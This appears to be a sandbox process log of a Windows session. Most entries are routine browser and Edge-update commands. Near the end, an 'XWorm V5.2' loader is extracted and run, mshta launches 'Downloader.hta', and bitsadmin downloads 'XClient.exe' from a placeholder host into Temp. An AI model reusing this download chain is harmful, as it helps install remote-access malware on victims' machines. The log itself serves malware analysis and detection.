"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3196 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3200 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4600 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5128 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5452 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3428 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5504 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Users\Admin\Downloads\winrar-x64-701 (1).exe
"C:\Users\Admin\Downloads\winrar-x64-701 (1).exe"
C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\88b1fcd3ac4b4009ad93299c76555df4 /t 5968 /p 1536
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5588 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4324 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1204 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5576 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Users\Admin\Downloads\winrar-x32-701.exe
"C:\Users\Admin\Downloads\winrar-x32-701.exe"
C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\d3092f89723b4e8296adabd22a598d1d /t 5112 /p 4276
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=5676 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=5736 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5816 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5612 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=5188 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=2260 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=3428 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4724 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4732 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5344 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4712 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2412 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Users\Admin\Downloads\winzip28-lan.exe
"C:\Users\Admin\Downloads\winzip28-lan.exe"
C:\Users\Admin\AppData\Local\Temp\e5f39b6\winzip28-lan.exe
run=1 shortcut="C:\Users\Admin\Downloads\winzip28-lan.exe"
C:\Users\Admin\AppData\Local\Temp\MicrosoftEdgeWebview2Setup.exe
"C:\Users\Admin\AppData\Local\Temp\MicrosoftEdgeWebview2Setup.exe" /install
C:\Program Files (x86)\Microsoft\Temp\EU46C6.tmp\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\Temp\EU46C6.tmp\MicrosoftEdgeUpdate.exe" /install "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers"
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe"
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe"
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe"
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xODcuMzciIHNoZWxsX3ZlcnNpb249IjEuMy4xODcuMzciIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7ODcxNzUzNUEtMkE2Mi00NDYzLTgyMzEtMTFBNEUxRTI0OTRGfSIgdXNlcmlkPSJ7RUJEMzlEM0MtNjBDRC00QjhELTk4MkUtNUZDNUU3QTg2MzYyfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9IntCMDdERDM0NC01N0FCLTQ4MTAtOEVDNC02MTRDQTI4RDU5NkZ9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iJnF1b3Q7RHhPYmpIR2ErblJhMmF0QzN3bytJRXBDNzgrWlllQVVia1hwREMyY2o3VT0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7RjNDNEZFMDAtRUZENS00MDNCLTk1NjktMzk4QTIwRjFCQTRBfSIgdmVyc2lvbj0iMS4zLjE4NS4yOSIgbmV4dHZlcnNpb249IjEuMy4xODcuMzciIGxhbmc9IiIgYnJhbmQ9IiIgY2xpZW50PSIiPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9Ijk4MTIzODY5OTYiIGluc3RhbGxfdGltZV9tcz0iNTAwIi8-PC9hcHA-PC9yZXF1ZXN0Pg
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /handoff "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers" /installsource otherinstallcmd /sessionid "{8717535A-2A62-4463-8231-11A4E1E2494F}"
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xODcuMzciIHNoZWxsX3ZlcnNpb249IjEuMy4xODcuMzciIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7ODcxNzUzNUEtMkE2Mi00NDYzLTgyMzEtMTFBNEUxRTI0OTRGfSIgdXNlcmlkPSJ7RUJEMzlEM0MtNjBDRC00QjhELTk4MkUtNUZDNUU3QTg2MzYyfSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7RDlEODVGRUYtRDczNS00NTgxLTlGOEYtMzVGNDI2OUZFMDA2fSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjgiIHBoeXNtZW1vcnk9IjgiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O0R4T2JqSEdhK25SYTJhdEMzd28rSUVwQzc4K1pZZUFVYmtYcERDMmNqN1U9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjExMC4wLjU0ODEuMTA0IiBuZXh0dmVyc2lvbj0iIiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSIyMCIgaW5zdGFsbGRhdGV0aW1lPSIxNzE0MTM1OTIwIiBvb2JlX2luc3RhbGxfdGltZT0iMTMzNTg2MzM2ODk5ODcxMjcwIj48ZXZlbnQgZXZlbnR0eXBlPSIzMSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMjExNDA2OCIgc3lzdGVtX3VwdGltZV90aWNrcz0iOTgxODI1NzAzNyIvPjwvYXBwPjwvcmVxdWVzdD4
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1584 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=5900 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=5452 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --mojo-platform-channel-handle=5700 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5764 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5824 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3200 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5624 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5300 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Users\Admin\Downloads\winzip28.exe
"C:\Users\Admin\Downloads\winzip28.exe"
C:\Users\Admin\AppData\Local\Temp\e60578a\winzip28.exe
run=1 shortcut="C:\Users\Admin\Downloads\winzip28.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=5392 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --mojo-platform-channel-handle=5528 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4928 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5612 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xODcuMzciIHNoZWxsX3ZlcnNpb249IjEuMy4xODcuMzciIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7ODcxNzUzNUEtMkE2Mi00NDYzLTgyMzEtMTFBNEUxRTI0OTRGfSIgdXNlcmlkPSJ7RUJEMzlEM0MtNjBDRC00QjhELTk4MkUtNUZDNUU3QTg2MzYyfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9IntGNjEwRUZCNi05MjIyLTQwRkYtOEZENS1EQTZGMkNGRTcwNjV9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iJnF1b3Q7VlBRb1AxRitmcTE1d1J6aDFrUEw0UE1wV2g4T1JNQjVpenZyT0MvY2hqUT0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7RjMwMTcyMjYtRkUyQS00Mjk1LThCREYtMDBDM0E5QTdFNEM1fSIgdmVyc2lvbj0iIiBuZXh0dmVyc2lvbj0iMTI0LjAuMjQ3OC45NyIgbGFuZz0iIiBicmFuZD0iIiBjbGllbnQ9IiIgZXhwZXJpbWVudHM9ImNvbnNlbnQ9ZmFsc2UiIGluc3RhbGxhZ2U9Ii0xIiBpbnN0YWxsZGF0ZT0iLTEiPjx1cGRhdGVjaGVjay8-PGV2ZW50IGV2ZW50dHlwZT0iOSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iOTgzMTYwNjQ3MCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjUiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9Ijk4MzE2MDY0NzAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIyIiBldmVudHJlc3VsdD0iNCIgZXJyb3Jjb2RlPSItMjE0NzIxOTQ0MCIgZXh0cmFjb2RlMT0iMjY4NDM1NDYzIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxMDg4MjY5NzMxMiIgaXNfYnVuZGxlZD0iMCIgc3RhdGVfY2FuY2VsbGVkPSI3IiB0aW1lX3NpbmNlX3VwZGF0ZV9hdmFpbGFibGVfbXM9IjEwNTEwOSIgdGltZV9zaW5jZV9kb3dubG9hZF9zdGFydF9tcz0iMTA1MDc4Ii8-PGV2ZW50IGV2ZW50dHlwZT0iMSIgZXZlbnRyZXN1bHQ9IjAiIGVycm9yY29kZT0iLTIxNDcyMTk0NDAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjEwODgzMDQ3MjI3IiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIiBkb3dubG9hZGVyPSJiaXRzIiB1cmw9Imh0dHA6Ly9tc2VkZ2UuZi50bHUuZGwuZGVsaXZlcnkubXAubWljcm9zb2Z0LmNvbS9maWxlc3RyZWFtaW5nc2VydmljZS9maWxlcy8zMjc5OThlMy00MTM0LTRlYjEtYThlZi0xYTY3N2ZlMGIyNTk_UDE9MTcxNjQ2OTgwOSZhbXA7UDI9NDA0JmFtcDtQMz0yJmFtcDtQND1WWHNjbmpHQnB5UnZmJTJmdWdtZnJieFVCdGl3YkZqb3JPWkJoYzhYT0hhb09YaVI5eFlIdUw2M1YzNk9tenolMmI2aU9tSWNKQ0MlMmJkZFllaTZSSHNPT0NiZyUzZCUzZCIgc2VydmVyX2lwX2hpbnQ9IiIgY2RuX2NpZD0iLTEiIGNkbl9jY2M9IiIgY2RuX21zZWRnZV9yZWY9IiIgY2RuX2F6dXJlX3JlZl9vcmlnaW5fc2hpZWxkPSIiIGNkbl9jYWNoZT0iIiBjZG5fcDNwPSIiIGRvd25sb2FkZWQ9IjEyNzQ0MzY3OCIgdG90YWw9IjE3MjgyMTA2NCIgZG93bmxvYWRfdGltZV9tcz0iMTAwODc1Ii8-PC9hcHA-PC9yZXF1ZXN0Pg
C:\Windows\SysWOW64\wermgr.exe
"C:\Windows\system32\wermgr.exe" "-outproc" "0" "2028" "1156" "1028" "1152" "0" "0" "0" "0" "0" "0" "0" "0"
C:\Windows\SysWOW64\wermgr.exe
"C:\Windows\system32\wermgr.exe" "-outproc" "0" "2536" "1144" "852" "1164" "0" "0" "0" "0" "0" "0" "0" "0"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5852 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap8850:104:7zEvent30402
C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe
"C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe"
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2f4 0x3b8
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\bitsadmin.exe
"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /installsource scheduler
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{BFFC50DF-F311-4333-81BC-37376CAA023B}\BGAUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{BFFC50DF-F311-4333-81BC-37376CAA023B}\BGAUpdate.exe" --edgeupdate-client --system-level
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\MicrosoftEdge_X64_124.0.2478.97.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\MicrosoftEdge_X64_124.0.2478.97.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\EDGEMITMP_2EDE8.tmp\setup.exe
